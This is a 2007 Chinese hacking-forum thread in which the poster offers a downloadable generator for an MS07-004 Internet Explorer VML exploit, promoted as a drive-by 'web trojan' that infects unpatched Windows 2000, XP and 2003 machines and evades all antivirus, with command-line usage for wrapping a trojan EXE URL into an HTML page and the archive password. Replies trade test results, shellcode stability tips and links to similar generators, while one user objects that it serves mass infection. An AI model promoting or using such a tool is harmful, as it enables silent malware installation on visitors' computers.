‹‹ 上一主题 | 下一主题 ››
 55 123
发新话题
打印

[原创]MS07-004 0Day生成器(Nighter版)

sinrre

死胖子

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
54 
精华
2 
积分
3628 
阅读权限
150 
在线时间
42 小时 
注册时间
2008-3-1 
最后登录
2008-8-26 
楼主 发表于 2007-1-23 02:21  只看该作者

[原创]MS07-004 0Day生成器(Nighter版)

软件作者:seraph.x
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

注意:本软件首发Seraph's Blog,后由原创作者友情提交到邪恶八进制信息安全团队讨论组。转载请注明原始出处Seraph's Blog

看幻影的刺已经出了MS07-004的分析报告,但是Exploit写的很粗糙,根本不适合直接用作网页木马,于是就写了这个MS07-004 0Day生成器,现在共享给大家,中马率特高,2000、XP、2003都测试通过,只要没打最新补丁的全过!过如今所有杀毒软件!

昨天我找www.feelids.com的慕容小雨要他们写的Exploit,他马上发给我一个exe文件,我打开一看是个动画演示,演示使用07004生成的网马肉鸡能否上线,然后我让他把Exploit发给我看下,他竟然说不给,要卖1万,无语了。

使用方法:CMD下运行MS07-004
http://www.target.com/***.exe(木马地址) ***.htm(生成后的文件)


解压密码:vip.nighter.net   

不要拿了东西就走人哦,有什么好东西要懂得跟大家分享。
技术交流群:839310

附件

ms07-004.rar (15 KB)

2007-1-23 02:21, 下载次数: 1214

仅供研究使用 请勿用于非法用途

为地震灾区的人们祈祷,一切都会重归美好。

TOP

better0332

晶莹剔透§烈日灼然

Rank: 1

帖子
46 
精华
0 
积分
152 
阅读权限
40 
在线时间
51 小时 
注册时间
2006-1-4 
最后登录
2008-8-3 
沙发 发表于 2007-1-23 16:05  只看该作者
XP,2003下成功,但2000下好像不行

TOP

stealthwalker

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
529 
精华
82 
积分
6504 
阅读权限
200 
在线时间
393 小时 
注册时间
2004-12-6 
最后登录
2008-8-22 

原创技术奖 核心建议奖 优秀管理奖 软件研发奖

椅子 发表于 2007-1-23 17:27  只看该作者
这个整数溢出好象有限制,楼主说的成功率指的是在什么系统上。。。而且看你生成的html文件来看,跟网上发布的似乎并没有什么不同。而且shellcode看了下好象并没有堆栈平衡的处理,估计挂IE是肯定的了。不知道偶说的对不对
俺是mika!别叫错了! 俺的QQ:794773 http://hi.baidu.com/stealthwalker/ my private area ------------------------------------------------------------ <a href=http://hi.baidu.com/stealthwalker target=_blank></a>

TOP

鬼仔

晶莹剔透§烈日灼然

Rank: 1

帖子
25 
精华
0 
积分
76 
阅读权限
40 
性别
男 
在线时间
515 小时 
注册时间
2004-11-3 
最后登录
2008-7-18 
板凳 发表于 2007-1-23 17:32  只看该作者
milw0rm.com上发过MS Internet Explorer VML Download and Execute Exploit

perl写的,生成器。

TOP

dingking

我伐克起来谁都挡不住! ...

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
762 
精华
2 
积分
4802 
阅读权限
100 
性别
男 
在线时间
764 小时 
注册时间
2005-6-17 
最后登录
2008-8-29 
地板 发表于 2007-1-23 17:40  只看该作者
确实没有堆栈平衡的处理,所以挂IE.... [s:39]
昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯

TOP

dayang1718

晶莹剔透§烈日灼然

Rank: 1

帖子
80 
精华
0 
积分
271 
阅读权限
40 
性别
男 
来自
shandong 
在线时间
87 小时 
注册时间
2006-10-7 
最后登录
2008-8-25 
6楼 发表于 2007-1-23 18:20  只看该作者
我看生成后的html代码和望上发布的没什么两样,我用我自己编译的生成器也生成一样的html文件,而且我发现我编译的程序只有19.1k,而楼主的程序却有40k,用peid扫下”Microsoft Visual C++ 6.0“,奇怪,大家小心~
love hack

TOP

ysc

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
19 
阅读权限
40 
性别
男 
在线时间
58 小时 
注册时间
2006-7-7 
最后登录
2008-7-3 
7楼 发表于 2007-1-23 18:24  只看该作者
是伪装壳吗?还是没加壳?

TOP

awu

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
4 小时 
注册时间
2006-3-12 
最后登录
2007-11-26 
8楼 发表于 2007-1-23 18:39  只看该作者
之前我也在网上看到一个,自己菜还不知道怎么改

TOP

紫侠客

晶莹剔透§烈日灼然

Rank: 1

帖子
186 
精华
0 
积分
149 
阅读权限
40 
性别
男 
在线时间
368 小时 
注册时间
2004-8-11 
最后登录
2007-10-30 
9楼 发表于 2007-1-23 20:50  只看该作者
[s:39] 小雨的那个不卡IE的~
Right here waitting...

TOP

icexiaoye

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
729 
精华
4 
积分
5185 
阅读权限
100 
性别
男 
在线时间
255 小时 
注册时间
2006-8-7 
最后登录
2008-8-23 
10楼 发表于 2007-1-23 21:03  只看该作者
[s:39] 好东东
特地赶来灌一水
玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.

TOP

xi5566

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
35 
阅读权限
40 
在线时间
10 小时 
注册时间
2006-10-25 
最后登录
2007-9-15 
11楼 发表于 2007-1-23 21:25  只看该作者
IE全部掉线 而且EXE文件未执行
测试系统 XP SP2

TOP

stealthwalker

技术核心组

Rank: 8Rank: 8

E.S.T核心成员

帖子
529 
精华
82 
积分
6504 
阅读权限
200 
在线时间
393 小时 
注册时间
2004-12-6 
最后登录
2008-8-22 

原创技术奖 核心建议奖 优秀管理奖 软件研发奖

12楼 发表于 2007-1-23 21:29  只看该作者
引用:
引用第8楼dayang17182007-01-23 18:20发表的:
我看生成后的html代码和望上发布的没什么两样,我用我自己编译的生成器也生成一样的html文件,而且我发现我编译的程序只有19.1k,而楼主的程序却有40k,用peid扫下”Microsoft Visual C++ 6.0“,奇怪,大家小心~
有些话在说的时候还是考虑清楚,没有根据不要乱说.虽然我没有去仔细看楼主的程序,但是单从你说的这点根据还是不成立的.VC编译出的debug版本大小40K还是很正常的.peid应该也能侦测出是release还是debug的,我手头上没有peid所以没法验证了。
俺是mika!别叫错了! 俺的QQ:794773 http://hi.baidu.com/stealthwalker/ my private area ------------------------------------------------------------ <a href=http://hi.baidu.com/stealthwalker target=_blank></a>

TOP

fhod

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
905 
精华
16 
积分
6885 
阅读权限
150 
性别
男 
在线时间
536 小时 
注册时间
2004-12-6 
最后登录
2008-8-26 
13楼 发表于 2007-1-23 22:27  只看该作者
小雨的那个不卡
命中率高
shellcode不一样的撒.

TOP

西北望

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
19 小时 
注册时间
2006-10-3 
最后登录
2007-9-19 
14楼 发表于 2007-1-24 00:16  只看该作者
XP SP2测试成功
晕,出现报错,进程报错,怎么修改?
难道是人品问题?

TOP

realone

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
33 
阅读权限
40 
在线时间
14 小时 
注册时间
2006-3-25 
最后登录
2008-2-2 
15楼 发表于 2007-1-24 10:41  只看该作者
让别人为了利益拿去挂马,这种生成器已经不是钻研技术范畴的东西了。

TOP

风蓝

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
181 
精华
12 
积分
3615 
阅读权限
100 
性别
男 
在线时间
327 小时 
注册时间
2005-4-12 
最后登录
2007-11-17 
16楼 发表于 2007-1-24 13:25  只看该作者
楼上的最不厚道,放不放关你什么事?

另外楼主的这个被AVG和卡巴杀。
我的Blog:http://www.tantao.cn

TOP

fenglin88

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
23 小时 
注册时间
2007-1-21 
最后登录
2008-1-27 
17楼 发表于 2007-1-24 15:04  只看该作者
测试不行 XP SP2  我把我自己写的EXE上传到空间  比如 http://www.host.com/xxx.exe 然后在本地ms07-004.exe http://www.host.com/xxx.exe ent.html 得到ENT.HTML  把ENT.HTML传到服务器上 然后通过本地访问 我写的EXE跟本没有执行....

TOP

1dian0

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
13 
阅读权限
40 
性别
男 
在线时间
14 小时 
注册时间
2005-8-5 
最后登录
2007-12-15 
18楼 发表于 2007-1-24 15:49  只看该作者
关于类似漏洞的堆栈恢复问题,还是相当值得研究一下,楼主的或是大牛门给点恢复的思路吧

TOP

废墟独存

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
5 小时 
注册时间
2006-5-9 
最后登录
2008-6-3 
19楼 发表于 2007-1-24 16:31  只看该作者
测试不上线  系统 xp sp2

TOP

dayang1718

晶莹剔透§烈日灼然

Rank: 1

帖子
80 
精华
0 
积分
271 
阅读权限
40 
性别
男 
来自
shandong 
在线时间
87 小时 
注册时间
2006-10-7 
最后登录
2008-8-25 
20楼 发表于 2007-1-24 18:07  只看该作者
另外,我想问一句就是c语言的代码,使用什么工具编译成exe的比较好,出错少!~
love hack

TOP

haiyang3137

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
13 
阅读权限
40 
性别
男 
在线时间
0 小时 
注册时间
2007-1-24 
最后登录
2007-10-23 
21楼 发表于 2007-1-24 21:05  只看该作者
加壳了没啊.是伪装壳吗?

TOP

hackwm

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
2 小时 
注册时间
2007-1-24 
最后登录
2007-3-3 
22楼 发表于 2007-1-24 21:22  只看该作者
网马之家有图形版的生成器:
http://www.hackwm.com/

TOP

hackwm

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
2 小时 
注册时间
2007-1-24 
最后登录
2007-3-3 
23楼 发表于 2007-1-24 21:33  只看该作者
[IMG]http://www.hackwm.com/download/wm07004.gif[/IMG]

TOP

realone

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
33 
阅读权限
40 
在线时间
14 小时 
注册时间
2006-3-25 
最后登录
2008-2-2 
24楼 发表于 2007-1-24 21:43  只看该作者
删了我的回复我也不生气。但想要工具的,哪个不是想去挂马的?我是为eviloctal原先挺好的一个技术氛围惋惜。
你们测试不成功很正常,溢出部分,每次覆盖的不一定是同一种对象的pvftable 最终的触发也不都是call [ecx+10],当然差不多落在大段heap里面也就可以,可是ie插件那么多,鬼知道你javascript 申请的内存在什么地方。

TOP

tsgxyy

晶莹剔透§烈日灼然

Rank: 1

帖子
34 
精华
0 
积分
84 
阅读权限
40 
在线时间
51 小时 
注册时间
2005-2-10 
最后登录
2008-5-28 
25楼 发表于 2007-1-25 10:25  只看该作者
不厚道,改天发一个偶改的.这样从milw0rm.com拉一个就变自己的.

你先能平衡了堆栈再拿出来悬.

TOP

‹‹ 上一主题 | 下一主题 ››
 55 123
发新话题